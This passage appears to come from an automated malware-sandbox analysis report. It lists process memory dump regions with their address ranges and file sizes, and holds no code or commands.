                                                                                                                        • memory/4372-248-0x00000000056B0000-0x0000000005CB6000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          6.0MB

                                                                                                                        • memory/4372-247-0x00000000057B0000-0x00000000057B1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4372-246-0x0000000005750000-0x0000000005751000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4372-240-0x0000000005CC0000-0x0000000005CC1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4400-335-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4404-347-0x000001E163600000-0x000001E163701000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          1.0MB

                                                                                                                        • memory/4404-281-0x00007FF6DAB94060-mapping.dmp
                                                                                                                        • memory/4404-325-0x000001E161040000-0x000001E1610B0000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          448KB

                                                                                                                        • memory/4420-214-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4444-267-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4468-356-0x0000000000400000-0x0000000002BF4000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          40.0MB

                                                                                                                        • memory/4468-345-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4468-355-0x0000000004740000-0x00000000047D1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          580KB

                                                                                                                        • memory/4472-153-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4476-245-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4476-244-0x0000000004F70000-0x0000000004F72000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/4476-241-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4476-242-0x0000000000810000-0x0000000000811000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4492-169-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4512-348-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4552-336-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4560-359-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4572-361-0x0000000005262000-0x0000000005263000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4572-365-0x0000000005263000-0x0000000005264000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4572-358-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4572-360-0x0000000005260000-0x0000000005261000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4580-354-0x0000000005790000-0x0000000005791000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4580-352-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4580-265-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4580-262-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4604-343-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4652-170-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4732-275-0x0000000005760000-0x0000000005761000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4732-271-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4816-179-0x00000000000E0000-0x00000000000E1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4816-185-0x00000000022E0000-0x00000000022E2000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/4816-176-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4816-182-0x0000000004AD0000-0x0000000004AD1000-memory.dmp
                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4832-353-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4848-357-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4880-151-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4932-338-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/4968-346-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/5024-266-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/5080-233-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/5080-344-0x0000000000000000-mapping.dmp
                                                                                                                        • memory/5108-181-0x0000000000000000-mapping.dmp